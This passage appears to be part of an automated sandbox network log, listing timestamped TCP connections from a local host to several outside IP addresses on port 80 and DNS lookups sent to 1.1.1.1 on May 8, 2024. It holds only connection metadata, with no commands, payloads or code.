                                                                                                                                                                                                        May 8, 2024 18:22:43.424587011 CEST4976680192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:43.625989914 CEST8049766162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.626117945 CEST8049766162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.626131058 CEST8049766162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.626147985 CEST8049766162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:43.626279116 CEST4976680192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:44.937361002 CEST4976680192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:45.955640078 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:46.157702923 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.157768965 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:46.160737991 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:46.362859011 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.362884045 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.362895966 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.362906933 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.362932920 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.363004923 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.363018990 CEST8049767162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:46.363039017 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:46.363073111 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:47.671792030 CEST4976780192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:48.690515041 CEST4976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:48.891424894 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:48.891551018 CEST4976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:48.893764973 CEST4976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:49.095211983 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:49.095360994 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:49.095375061 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:49.095386982 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:49.097738981 CEST4976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:49.104463100 CEST4976880192.168.2.4162.240.81.18
                                                                                                                                                                                                        May 8, 2024 18:22:49.304650068 CEST8049768162.240.81.18192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.268450975 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:55.611669064 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.611785889 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:55.613598108 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:55.956938028 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957185984 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957273006 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957406998 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:55.957485914 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957500935 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957515001 CEST8049769103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.957565069 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:55.957565069 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:57.127804041 CEST4976980192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.144238949 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.487528086 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.487622023 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.490015984 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.833230972 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.833821058 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.833906889 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.833957911 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.834079027 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.834095001 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.834112883 CEST8049770103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:58.834135056 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:58.834260941 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:22:59.999536037 CEST4977080192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.017959118 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.361155033 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.361248970 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.367810011 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713557959 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713579893 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713627100 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713777065 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713798046 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713932991 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713947058 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713958979 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.713968992 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.713973045 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714062929 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:01.714102983 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714119911 CEST8049771103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:01.714214087 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:02.874368906 CEST4977180192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:03.895807028 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.239061117 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.239150047 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.241189957 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584356070 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584686995 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584809065 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584858894 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584878922 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584898949 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584914923 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:04.584983110 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.584997892 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.588560104 CEST4977280192.168.2.4103.93.125.69
                                                                                                                                                                                                        May 8, 2024 18:23:04.931736946 CEST8049772103.93.125.69192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.288656950 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.603955030 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.604053974 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.606301069 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.920547962 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.977943897 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.977967024 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978015900 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978029013 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978041887 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978055000 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978068113 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978081942 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978094101 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978102922 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978112936 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978125095 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978137016 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.978147030 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:19.978197098 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:20.292618990 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:20.292645931 CEST80497733.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:20.292788982 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:21.108935118 CEST4977380192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.129841089 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.444251060 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.447928905 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.451828003 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.764202118 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864010096 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864037037 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864049911 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864075899 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864090919 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864111900 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864125013 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864140987 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864155054 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864167929 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:22.864166021 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.864239931 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:22.864239931 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:23.176656008 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:23.176682949 CEST80497743.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:23.176731110 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:23.952476025 CEST4977480192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:24.977837086 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.289747000 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.289836884 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.293934107 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.604665995 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604693890 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604705095 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604717016 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604728937 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604739904 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.604758978 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649450064 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649569035 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649611950 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649719000 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649734020 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649746895 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649763107 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649776936 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649785995 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649801970 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649806976 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649816036 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649835110 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.649837971 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.649879932 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:25.960336924 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.960375071 CEST80497753.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:25.960449934 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:27.231646061 CEST4977580192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:28.236514091 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:28.552933931 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.555896997 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:28.557718992 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:28.873177052 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927701950 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927727938 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927740097 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927752018 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927789927 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927802086 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927831888 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927845001 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927856922 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927870035 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:28.927886963 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:28.927930117 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.243781090 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.243810892 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.243904114 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.243916988 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.243932009 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.243993998 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244057894 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244076967 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244091034 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244110107 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244122982 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244131088 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244138002 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244151115 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244152069 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244187117 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244240999 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244255066 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244267941 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244282007 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244296074 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244297981 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244308949 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244323015 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244324923 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244334936 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244348049 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.244353056 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244369984 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.244390011 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.559437037 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.559454918 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.559468985 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:29.559593916 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.564121008 CEST4977680192.168.2.43.73.27.108
                                                                                                                                                                                                        May 8, 2024 18:23:29.879498959 CEST80497763.73.27.108192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:43.326219082 CEST4977780192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:43.637501955 CEST804977791.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:43.639956951 CEST4977780192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:44.751929998 CEST4977780192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:45.063353062 CEST804977791.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:45.063368082 CEST804977791.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:45.063438892 CEST4977780192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:46.265068054 CEST4977780192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:47.286058903 CEST4977880192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:47.597435951 CEST804977891.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:47.597507954 CEST4977880192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:47.599287033 CEST4977880192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:47.912966013 CEST804977891.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:47.913039923 CEST804977891.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:47.913078070 CEST4977880192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:49.108774900 CEST4977880192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:50.130074978 CEST4977980192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:50.440983057 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.442352057 CEST4977980192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:50.446114063 CEST4977980192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:50.757019043 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757035017 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757077932 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757091999 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757116079 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757128000 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:50.757141113 CEST804977991.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:52.973887920 CEST4978080192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:53.285290956 CEST804978091.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:53.285386086 CEST4978080192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:53.287883043 CEST4978080192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:53.599443913 CEST804978091.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:53.599462032 CEST804978091.195.240.19192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:53.599615097 CEST4978080192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:53.602756977 CEST4978080192.168.2.491.195.240.19
                                                                                                                                                                                                        May 8, 2024 18:23:53.914283037 CEST804978091.195.240.19192.168.2.4

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        May 8, 2024 18:20:40.192984104 CEST6285853192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:20:40.642802000 CEST53628581.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:20:56.377676964 CEST5504153192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:20:56.545008898 CEST53550411.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:04.862536907 CEST6288853192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:21:05.035909891 CEST53628881.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:19.226341963 CEST6249553192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:21:19.747299910 CEST53624951.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:34.627772093 CEST5425153192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:21:35.244816065 CEST53542511.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:50.893718958 CEST6241053192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:21:51.386219025 CEST53624101.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:07.535444021 CEST5332253192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:07.728657007 CEST53533221.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:16.482281923 CEST5786153192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:16.925327063 CEST53578611.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:30.565635920 CEST6215253192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:30.734927893 CEST53621521.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:35.032275915 CEST5569753192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:35.199683905 CEST53556971.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:40.206439972 CEST5920553192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:40.495079994 CEST53592051.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:54.114023924 CEST5182453192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:55.109824896 CEST5182453192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:22:55.266092062 CEST53518241.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:22:55.273056984 CEST53518241.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:09.600367069 CEST6461953192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:09.790380001 CEST53646191.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:17.863058090 CEST6028053192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:18.874846935 CEST6028053192.168.2.41.1.1.1
                                                                                                                                                                                                        May 8, 2024 18:23:19.283178091 CEST53602801.1.1.1192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:23:19.283200026 CEST53602801.1.1.1192.168.2.4
